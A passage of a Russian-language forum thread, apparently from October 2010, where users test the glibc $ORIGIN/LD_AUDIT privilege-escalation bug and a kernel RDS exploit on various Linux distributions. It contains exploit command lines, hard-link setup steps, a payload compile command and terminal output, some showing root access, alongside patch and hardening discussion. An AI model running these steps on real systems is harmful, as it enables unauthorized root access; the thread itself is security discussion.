В ХР необходимости не было получать такой доступ. Зловреды и так работали. Поэтому никто и не интересовался.

2.35, name (??), 16:44, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
вирусы типа kido отлично знают, в отличие от вас.

2.59, User294 (ok), 17:55, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
Господи, что вы там курите если не понимаете разницы между ядром и либой привиле... большой текст свёрнут, показать

2.68, Зилибоба (ok), 18:41, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
чтоб глупости в голову не лезли, нужно больше читать умных статей, например, http://www.microsoft.com/technet/security/advisory/2269637.mspx.

3.79, Пользователь Debian (?), 19:34, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
"Server Error in '/technet' Application." Кажется, Вы запостили в этом URL'е эксплойт IIS!!!111

4.108, Аноним (-), 00:30, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
точку в конце адреса убери

4.109, Митра (?), 00:31, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
там точка в конце лишняя.

3.93, User294 (ok), 22:26, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
А это вообще лулзов пачка :). Более того - была еще фича: предложить юзеру скачать DLL :).А потом ... потом когда юзер ее скачает, при старте фурифокса она поюзается до системной библы с таким же именем. При чем дыра была специфичная для винды почему-то. Видимо остальные системы не настолько "умны" чтобы на свой зад искать и грузить либы откуда попало (current directory?). P.S. алсо, говорят что stuxnet пробивает винду от просто факта втыкания флехи. Какая-то дыра в обработке ярлыков, чтоли. Прямо так, без старта программы авторана даже, просто воткнули - и вас поимели. Что-то из этого вроде даже до сих пор не запатчено если меня не подводит склероз по части секурити уведомлений. Читайте сайты по секурити в общем - узнаете много нового. Спокойно спать перестанете заодно :)

4.133, Добрый Аноним (?), 11:53, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
> А это вообще лулзов пачка :). Более того - была еще фича: > предложить юзеру скачать DLL :).А потом ... потом когда юзер ее > скачает, при старте фурифокса она поюзается до системной библы с таким > же именем. При чем дыра была специфичная для винды почему-то. Видимо > остальные системы не настолько "умны" чтобы на свой зад искать и > грузить либы откуда попало (current directory?). ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать что та же дыра и в лунухах имеет(ла) место быть.

5.137, Зилибоба (ok), 13:42, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
>> А это вообще лулзов пачка :). Более того - была еще фича: >> предложить юзеру скачать DLL :).А потом ... потом когда юзер ее >> скачает, при старте фурифокса она поюзается до системной библы с таким >> же именем. При чем дыра была специфичная для винды почему-то. Видимо >> остальные системы не настолько "умны" чтобы на свой зад искать и >> грузить либы откуда попало (current directory?). > ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать > что та же дыра и в лунухах имеет(ла) место быть. Во первых - была, а во вторых, пруф давайте.

6.144, Добрый Аноним (?), 14:37, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Во первых не была , такие баги постоянно появляются от приложения к приложению ... большой текст свёрнут, показать

5.139, paxuser (?), 14:15, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
> ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать > что та же дыра и в лунухах имеет(ла) место быть. Не в "лунухах", а в Debian. Этот дистрибутив давно себя "зарекомендовал".

6.145, Добрый Аноним (?), 14:40, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
>> ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать >> что та же дыра и в лунухах имеет(ла) место быть. > Не в "лунухах", а в Debian. Этот дистрибутив давно себя "зарекомендовал". да какая разница? главное, что это проблема не только вин система, как некоторые тут утверждают.

1.27, Аноним (-), 16:31, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
Особенно порадовало отношение разработчиков glibc.. бага есть? - ну есть, ну и нафик - не будем ее фиксить, не сломают. А если сломают? - тогда и пофиксим. Чем-то это напоминает отношение MS к выпуску обновлений. Не ужели FSF не может нормально следить за ключевым проектом?

2.36, z (??), 16:45, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
линейкой по пальцам через интернеты =)

1.29, savant (ok), 16:37, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Arch, при выполнении LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 шелл просто падает

1.40, aNoN (?), 16:58, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
В funtoo тоже suid бит для хардлинка не выставляется, поэтому не работает. В debiane - лехко, но падает шелл.

2.63, User294 (ok), 18:28, 19/10/2010 [^] [^^] [^^^] [ответить]

+/–

> В debiane - лехко, но падает шелл.

Ога, с ассертом в libc.

2.65, tamerlan311 (?), 18:34, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
в Дебиане давно используется eglibc вместо классической libc

3.69, Sylvia (ok), 18:46, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
и несмотря на то, что eglibc всего лишь форк от glibc, в eglibc ( 2.11.2 ) эксплоит не работает.

1.42, Аноним (-), 17:01, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
~ $ mkdir /tmp/exploit ~ $ ln /bin/ping /tmp/exploit/target ~ $ exec 3< /tmp/exploit/target -bash: /tmp/exploit/target: Отказано в доступе gentoo ~x86_64

2.71, Sylvia (ok), 18:56, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
suid бинарник на который делается линк должен быть читаемым mode 4755 например, если он нечитаем, но выполним, то exec 3 не пройдет.

1.44, User294 (ok), 17:03, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]

+/–

А "презренные бубунты" этот сплойт не пробирает. Посему странно ждать исправления для них - а они походу не эксплойтабельны и так?! Какой редхатчик новость писал? Он был не в курсе что в убунте/дебияне юзается другая либа - eglibc? Или какого буя про исправления написано? Пусть автор новости объяснит свою логику наведения паники? oO

В бубунтах шелл просто убивается с assertion failed. И фигъ мне а не рут, соответственно. Так что приветы крЮтому редхату и Ульриху. Энтерпрайзнички, а на стандарт вот забили :-).

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

2.55, Аноним (-), 17:30, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
с openSuSE аналогично - умирает шелл.

2.56, anonymous (??), 17:31, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
>другая либа - eglibc Embedded GLIBC (EGLIBC) is a variant of the GNU C Library (GLIBC) that is designed to work well on embedded systems.

3.61, User294 (ok), 18:19, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
> Embedded GLIBC (EGLIBC) is a variant of the GNU C Library (GLIBC) > that is designed to work well on embedded systems. Спасибо, Кэп. Но это не отменяет факта что приведенный эксплойт работает только на редхатах, но не катит в дебиянообразных. Судя по всему как раз потому что либа другая. Я где-то ошибаюсь в моей логике? Тогда покажите где.

4.162, solardiz (ok), 17:41, 20/10/2010 [^] [^^] [^^^] [ответить]

+1 +/–

> Судя по всему как раз потому что либа другая. Я где-то ошибаюсь в моей логике? Тогда покажите где.

Да, ошибаешься. Тут дело не в glibc vs. eglibc, а в опциях сборки. -DNDEBUG убирает assert'ы, которые, в теории, на уже отлаженном коде не нужны. А реально - в данном случае помогали. То, что срабатывает assert внутри glibc/eglibc - это признак наличия бага - так что исправление для Debian и Ubuntu должно появиться. Возможно, оно не будет считаться security fix'ом, хотя уверенности в том что assert'а было достаточно, чтобы спастись от всех способов атаки, нет.

А вот Owl и ALT Linux этой проблеме не подвержены по другим причинам. :-)

1.47, Аноним (-), 17:19, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
$ LD_AUDIT="\$ORIGIN" exec /proc/$$/fd/3 bash: /proc/30974/fd/3: Permission denied bash: exec: /proc/30974/fd/3: cannot execute: Success $ хз... видимо я так давно не обновлялся, что LD_AUDIT у меня не поддерживается =))

2.52, Аноним (-), 17:25, 19/10/2010 [^] [^^] [^^^] [ответить]

+/–

а, нет, вру, дескриптор перепутал, assert срабатывает:

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

1.50, Аноним (-), 17:24, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.

1.54, прххффф (?), 17:30, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+2 +/–
На Debian не работает. Вывод: RedHat дырявый :-) $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

1.57, Аноним (-), 17:39, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
в ubuntu 10.10: $ mkdir /tmp/exploit $ ln /bin/ping /tmp/exploit/target ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

2.80, Sylvia (ok), 19:37, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
жесткую ссылку можно сделать в пределах 1 устройства, у вас наверное /tmp и /bin на разных партициях/устройствах

3.84, val (??), 20:32, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
у меня тоже ubuntu 10.10. tmp и bin на одном разделе. то же самое выдает.

1.64, Vasily Pupkin (?), 18:34, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] ==

1.66, Аноним2 (?), 18:35, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
В основной ссылке по новости есть второй метод атаки http://seclists.org/fulldisclosure/2010/Oct/257 Почему его еще никто не попробовал? Там ссылки делать не придется.

2.70, Аноним (-), 18:53, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
пробовали не работает bash: line 28: /tmp/exploit/traget: No such file or directory

3.76, Аноним2 (?), 19:15, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Что-то вы не то делаете видимо, но и у меня не получается Это как раз способ дл... большой текст свёрнут, показать

4.88, Аноним (-), 21:38, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
funtoo, glibc-2.11-r1 Assertion ... failed

4.90, ozs (ok), 21:55, 19/10/2010 [^] [^^] [^^^] [ответить]

+/–

>>>$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &

[1] 5559

А что вот это [1] 5559 , у меня пишет такая команда не найдена.

5.99, User294 (ok), 23:06, 19/10/2010 [^] [^^] [^^^] [ответить]

+/–

> А что вот это [1] 5559 , у меня пишет такая команда не найдена.

Это? Это - стопроцентный EPIC FAIL! :))))

Хинт: ввести выданные шеллом номер job и его pid как команду - круто придумано. Вы б думали что вводите, а? Иначе вы рискуете оказаться однажды в роли обезьяны с гранатой.

6.116, ozs (ok), 02:11, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Спасибо >>Иначе вы рискуете оказаться однажды в роли обезьяны с гранатой. От этого никто не застрахован.

4.117, ozs (ok), 02:17, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
"[1] 5559"чей pid должен быть?

2.74, Sylvia (ok), 19:08, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
sylvia@evy /var/tmp $ pkill -n -t $(tty \| sed 's#/dev/##') sleep -bash: line 3: 18668 Terminated sleep 1h sylvia@evy /var/tmp $ warning: debug option 'nonsense' unknown; try LD_DEBUG=help Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed! с eglibc 2.11.2 со вторым способом также срабатывает ассерт

2.78, AX (?), 19:21, 19/10/2010 [^] [^^] [^^^] [ответить]

+/–

> В основной ссылке по новости есть второй метод атаки
> http://seclists.org/fulldisclosure/2010/Oct/257

После выполнения pkill:

warning: debug option 'nonsense' unknown; try LD_DEBUG=help
Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

> Там ссылки делать не придется.

(head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN" /tmp/exploit/target 2>&1)

В первой же строке запуск всё той же ссылки на ping.

1.67, Vasily Pupkin (?), 18:41, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
У меня вообще ни на одной машине не получилось заэксплуатировать. 1. У меня всё с SUID на отдельных разделах 2. Всё с suid только на 111 3. Даже когда я это всё пофиксил, всё равно вываливается ассёрт :]

1.72, Al1966 (?), 18:57, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Fedora12 получилось. :(

1.89, Добрый Аноним (?), 21:40, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
Вот, а кто-то мне тут рассказывал, что в линухах держать все на одном разделе можно спокойно, там людей не тревожат переполнения разделов, опции монтирования, а теперь не тревожат еще и всякие уязвимости.... О безопасности думать надо, да.

1.91, i (??), 22:02, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]

+1 +/–

чето облом на 2й же команде
ln /bin/ping /tmp/exploit/target
ln: создание жесткой ссылки «/tmp/exploit/target» => «/bin/ping»: Неверная ссылка между устройствами

ладно создал в /home но опять же:
ls -l /proc/$$/fd/3
ls: невозможно получить доступ к /proc/18810/fd/3: Нет такого файла или каталога

glibc-2.11.2

1.97, balex (??), 22:37, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Опять этот SUID... Ну и как всегда о сто и одном способе "как получить линукс с правами обычного пользователя" тут не поведали. Те же юзеры, которые работают в удалённых xnix окружениях наверное и так бояться что-нить "уронить", конечно без дятлов никуда...

1.103, Аноним (-), 00:06, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
andrey@evilhorse /var/run/exploit $ ls -ld . drwxrwxrwx 2 andrey andrey 4096 Окт 19 23:03 . andrey@evilhorse /var/run/exploit $ ln /bin/ping /var/run/exploit/target andrey@evilhorse /var/run/exploit $ ls -l итого 28 -rws--x--x 2 root root 26508 Авг 18 2008 target andrey@evilhorse /var/run/exploit $ exec 3< /var/run/exploit/target bash: /var/run/exploit/target: Отказано в доступе andrey@evilhorse /var/run/exploit $ не работает

2.105, Аноним (-), 00:13, 20/10/2010 [^] [^^] [^^^] [ответить]

+/–

если пофиксить права на /bin/ping:

Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

и падение

1.113, Аноним (-), 01:48, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
тестовая система, собранна из исходников ./configure && make && make install , ни каких патчей безопасности - тот же ".. Assertion .."

1.115, ifel (??), 02:08, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
CO5 i386/x86_64 - пашет на ура CO4 - не работает На CO5 мы уже собрали rpms patched и разлили по серверам.

1.124, d4r (?), 07:58, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
мда, 2 ехплоита за один вечер, етот и http://www.exploit-db.com/exploits/15285. уид=0 на Linux box 2.6.34.7-56.fc13.i686 #1 SMP Wed Sep 15 03:33:58 UTC 2010 i686 i686 i386 GNU/Linux

2.126, killer1804 (??), 08:35, 20/10/2010 [^] [^^] [^^^] [ответить]

+/–

> мда, 2 ехплоита за один вечер, етот и http://www.exploit-db.com/exploits/15285. уид=0
> на Linux box 2.6.34.7-56.fc13.i686 #1 SMP Wed Sep 15 03:33:58 UTC
> 2010 i686 i686 i386 GNU/Linux

[user0@video_srv ~]$ ./expl.bin
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved cap_ptrace_traceme to 0xc1149490
[+] Resolved commit_creds to 0xc1060fe0
[+] Resolved prepare_kernel_cred to 0xc1060db0
[*] Failed to resolve kernel symbols.
[user0@video_srv ~]$

[user0@video_srv ~]$ uname -a
Linux video_srv 2.6.32-ARCH

увы и ах

3.127, Вова (?), 09:18, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
$ ./a.out [] Linux kernel >= 2.6.30 RDS socket exploit [] by Dan Rosenberg [] Resolving kernel addresses... [+] Resolved security_ops to 0xffffffff81c44e50 [+] Resolved default_security_ops to 0xffffffff81a3daa0 [+] Resolved cap_ptrace_traceme to 0xffffffff811c73f4 [+] Resolved commit_creds to 0xffffffff81056b7b [+] Resolved prepare_kernel_cred to 0xffffffff81056a37 [] Could not open socket. ~ $ uname -a Linux 2.6.34.1 #5 SMP Tue Aug 24 15:56:29 MSD 2010 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 5000+ AuthenticAMD GNU/Linux

4.128, korrado (?), 09:44, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
ls -l /bin/ping если для не юзера стоит r-x, эсплойт работает (Мандривы, Федоры, Убанты) если стоит, --x, то не работает (Слаки и другие)

5.138, Вова (?), 13:45, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
> ls -l /bin/ping > если для не юзера стоит r-x, эсплойт работает (Мандривы, Федоры, Убанты) > если стоит, --x, то не работает (Слаки и другие) в данной теме присутствуют два эксплойта, один скриптом (вы о нём), другой программкой.

1.132, АнонимМ (?), 11:48, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]

+/–

Что-то в Red Hat Enterprise Linux Server release 5.1 (Tikanga) работать не хотит.

bea@yam-ind:/tmp>gcc -w -fPIC -shared -o /tmp/exploit payload.c
payload.c:7: ошибка: redefinition of ‘init’
payload.c:2: ошибка: previous definition of ‘init’ was here

glibc-2.5-18
Что-то пока не страшно.

2.134, ifel (??), 12:02, 20/10/2010 [^] [^^] [^^^] [ответить]

+/–

> Что-то в Red Hat Enterprise Linux Server release 5.1 (Tikanga) работать не
> хотит.
> bea@yam-ind:/tmp>gcc -w -fPIC -shared -o /tmp/exploit payload.c
> payload.c:7: ошибка: redefinition of ‘init’
> payload.c:2: ошибка: previous definition of ‘init’ was here
> glibc-2.5-18
> Что-то пока не страшно.

Что-то у Вас в .c file ошибка, а не работать не хочет. Проверьте, что вставили все один раз и без спец символов.

Да и RHEL 5.1 как бы outdated уже, там остального добра думаю хватит, даже если это и не работает.

3.146, АнонимМ (?), 14:41, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Да правда ваша - работает.

1.135, TS (ok), 12:59, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Умные люди давно следуют рекомендациям по безопасности. например от NSA. Открываем "Guide to the Secure Configuration of Red Hat Enterprise Linux 5" - http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf - читаем - 2.1.1.1.1 Create Separate Partition or Logical Volume for /tmp 2.1.1.1.2 Create Separate Partition or Logical Volume for /var ... 2.1.1.1.5 Create Separate Partition or Logical Volume for /home if Using Local Home Directories ... 2.2.1.3 Add nodev, nosuid, and noexec Options to Temporary Storage Partitions 2.2.1.4 Bind-mount /var/tmp to /tmp ... 2.2.3.4 Find Unauthorized SUID/SGID System Executables

1.148, буба (?), 15:31, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Ubuntu 10.04: moo@moo:~$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

2.150, буба (?), 15:45, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
CentOS 5.3 [moo@co53 ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 [root@co53 ~]#

3.154, буба (?), 16:42, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
После "yum update glibc" с версии 2.5.34 до 2.5.49 и пересборки эксплоит все-равно работет на CentOS.

4.190, буба (?), 18:41, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Сегодня вышел апдейт glibc, после которого $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 вырубает шелл.

1.191, Аноним (-), 20:26, 21/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
I just can't create the link from /bin/ping to /tmp/exploit/target ln: creating hard link 'exploit/target' => '/bin/ping': Invalid cross-device link

1.192, paxuser (ok), 00:18, 22/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Сегодня на #grsecurity: <taviso> kees: we pwned you :) <taviso> (check your mail) <kees> taviso: aaah craps <kees> taviso: nice work :) <taviso> thanks :D <spender> AHH CRAPS <kees> taviso: well, no worries, the glibc update was waiting in the wings anyway. I'll get it published. :) <spender> I INFERR THAT UBUNTU IS VULN TO THE GLIBC BUG <spender> and i guess all other eglibc users too? :p

2.193, solardiz (ok), 02:33, 23/10/2010 [^] [^^] [^^^] [ответить]	+/–
Да, второй раунд: http://lists.openwall.net/full-disclosure/2010/10/22/15 Исправление для Debian: http://lists.openwall.net/full-disclosure/2010/10/22/16

1.194, Аноним (-), 06:07, 23/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
ln /bin/ping /tmp/exploit/target ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется OpenSUSE 11.3 // Kernel 2.6.35.4 + Ubuntu patches + BFQ + BFS Наверное yama мли apparmor виноваты....

2.195, paxuser (ok), 08:06, 23/10/2010 [^] [^^] [^^^] [ответить]	+/–
> ln /bin/ping /tmp/exploit/target > ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется Для эксплуатации второй уязвимости хардлинки не нужны.

игнорирование участников | лог модерирования

Добавить комментарий

Текст: